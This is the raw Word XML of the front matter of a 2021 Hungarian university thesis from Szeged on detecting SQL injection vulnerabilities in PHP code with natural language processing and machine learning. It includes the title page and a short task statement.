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382A" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E725F0D" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64B54D9D" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:pStyle w:val="dco1"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Szegedi Tudományegyetem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6F5C59" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:pStyle w:val="dco1"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Informatikai Intézet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3693C8" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71D02423" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="590753AA" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="092191D4" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E42929" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="370BFE1C" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62204772" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4035D5A5" w14:textId="64725810" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00CB27D6" w:rsidP="00A62937">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>SQ</w:t>
      </w:r>
      <w:r w:rsidR="00B937D1" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> injection detektálás természetes nyelvi feldolgozó rendszerek és gépi tanulás által</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C520111" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20FFD91F" w14:textId="00366E89" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00626C21" w:rsidP="00626C21">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>SQL injection detection using natural language processing systems and machine learning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12393C20" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38C46481" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61506A46" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6509EF39" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="492B37D8" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:pStyle w:val="dco3"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Szakdolgozat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0A4704" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17532D5C" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CFFF225" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31F95979" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45EA3D51" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="463F1568" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D250D78" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1182BADE" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="741"/>
        <w:gridCol w:w="3215"/>
        <w:gridCol w:w="649"/>
        <w:gridCol w:w="3315"/>
        <w:gridCol w:w="583"/>
      </w:tblGrid>
      <w:tr w:rsidR="00286790" w:rsidRPr="00D47FAE" w14:paraId="04093CAF" w14:textId="77777777" w:rsidTr="00A67FE7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="828" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F479D4E" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
            <w:pPr>
              <w:pStyle w:val="dco4"/>
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="596A9E30" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
            <w:pPr>
              <w:pStyle w:val="dco4"/>
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D47FAE">
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>Készítette:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A438402" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
            <w:pPr>
              <w:pStyle w:val="dco4"/>
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B2C2222" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
            <w:pPr>
              <w:pStyle w:val="dco4"/>
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D47FAE">
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>Témavezető:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2726514A" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
            <w:pPr>
              <w:pStyle w:val="dco4"/>
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00286790" w:rsidRPr="00D47FAE" w14:paraId="318AC4F5" w14:textId="77777777" w:rsidTr="00A67FE7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="828" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7169ACE9" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E1B4E58" w14:textId="26A11496" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00664BB4" w:rsidP="00A62937">
            <w:pPr>
              <w:pStyle w:val="dco5"/>
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D47FAE">
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>Stiller Marianna</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78996ECA" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="313C4015" w14:textId="652DD0A3" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="0001235A" w:rsidP="00A62937">
            <w:pPr>
              <w:pStyle w:val="dco5"/>
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D47FAE">
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>Dr. Vidács László</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F73337A" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00286790" w:rsidRPr="00D47FAE" w14:paraId="18414642" w14:textId="77777777" w:rsidTr="00A67FE7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="828" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33B2CBBD" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D3ED83D" w14:textId="5F12251F" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00506813" w:rsidP="00A62937">
            <w:pPr>
              <w:pStyle w:val="dco6"/>
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D47FAE">
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>p</w:t>
            </w:r>
            <w:r w:rsidR="00286790" w:rsidRPr="00D47FAE">
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t xml:space="preserve">rogramtervező </w:t>
            </w:r>
            <w:r w:rsidR="00520DF3" w:rsidRPr="00D47FAE">
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>informatika szakos hallgató</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EFAA069" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="358D00F1" w14:textId="77777777" w:rsidR="000E2910" w:rsidRPr="00D47FAE" w:rsidRDefault="0006601E" w:rsidP="00A62937">
            <w:pPr>
              <w:pStyle w:val="dco6"/>
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D47FAE">
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>tudományos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FE8A68D" w14:textId="5F21FA52" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="0006601E" w:rsidP="00A62937">
            <w:pPr>
              <w:pStyle w:val="dco6"/>
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D47FAE">
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>főmunkatárs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B4A30DC" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B311FD4" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="469ED74A" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56B61277" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21EF3E3E" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72339049" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F333076" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:pStyle w:val="dco3"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Szeged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D70718" w14:textId="3AF281BD" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:pStyle w:val="dco3"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="0001235A" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3937F099" w14:textId="77777777" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3215DEFF" w14:textId="7776034B" w:rsidR="00520DF3" w:rsidRPr="00D47FAE" w:rsidRDefault="00520DF3" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CBB017F" w14:textId="77777777" w:rsidR="00821DF5" w:rsidRPr="00D47FAE" w:rsidRDefault="00821DF5" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41FAC9DC" w14:textId="77777777" w:rsidR="008D138C" w:rsidRPr="00D47FAE" w:rsidRDefault="008D138C" w:rsidP="00A62937">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A5B004" w14:textId="77777777" w:rsidR="00A62937" w:rsidRPr="00D47FAE" w:rsidRDefault="00A62937" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc80443487"/>
    </w:p>
    <w:p w14:paraId="2E938CE2" w14:textId="183FDE73" w:rsidR="009960B3" w:rsidRPr="00D47FAE" w:rsidRDefault="00B32904" w:rsidP="002B6A5A">
      <w:pPr>
        <w:pStyle w:val="Cmsor2"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc71471958"/>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Feladatkiírás</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="6545A6C9" w14:textId="355A1823" w:rsidR="00A62937" w:rsidRPr="00D47FAE" w:rsidRDefault="00A62937" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="185FCF4A" w14:textId="77777777" w:rsidR="00A41C9C" w:rsidRPr="00D47FAE" w:rsidRDefault="00A41C9C" w:rsidP="00A41C9C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Az SQL Injection napjaink leggyakoribb és legveszélyesebb sérülékenysége, amely a felhasználói input elégtelen mértékű validációjából ered, következménye pedig SQL lekérdezések futtatása érzékeny adatokon. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5168EC3B" w14:textId="4CEB4EA3" w:rsidR="00B55F7D" w:rsidRPr="00D47FAE" w:rsidRDefault="00A41C9C" w:rsidP="002E3884">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A rendszer természetes nyelvi feldolgozó rendszerek és gépi tanulás által képes lesz forrásódban SQL Injection sérülékenységeket keresni. Működésének alapja, hogy valós PHP alapú forráskódokból reprezentál absztrakt szintaxis fákat, melyekből mintákat nyer ki, amit később megtanul.</w:t>
      </w:r>
      <w:r w:rsidR="00B55F7D" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="590A0649" w14:textId="77777777" w:rsidR="00A62937" w:rsidRPr="00D47FAE" w:rsidRDefault="00A62937" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc80443488"/>
    </w:p>
    <w:p w14:paraId="2991BC62" w14:textId="3CD52C1C" w:rsidR="00B55F7D" w:rsidRPr="00D47FAE" w:rsidRDefault="00B55F7D" w:rsidP="002B6A5A">
      <w:pPr>
        <w:pStyle w:val="Cmsor2"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc71471959"/>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Tartalmi összefoglaló</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="56F4B286" w14:textId="77777777" w:rsidR="00B55F7D" w:rsidRPr="00D47FAE" w:rsidRDefault="00B55F7D" w:rsidP="00A62937">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04719DFE"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téma megnevezése:</w:t>
      </w:r>
    </w:p>
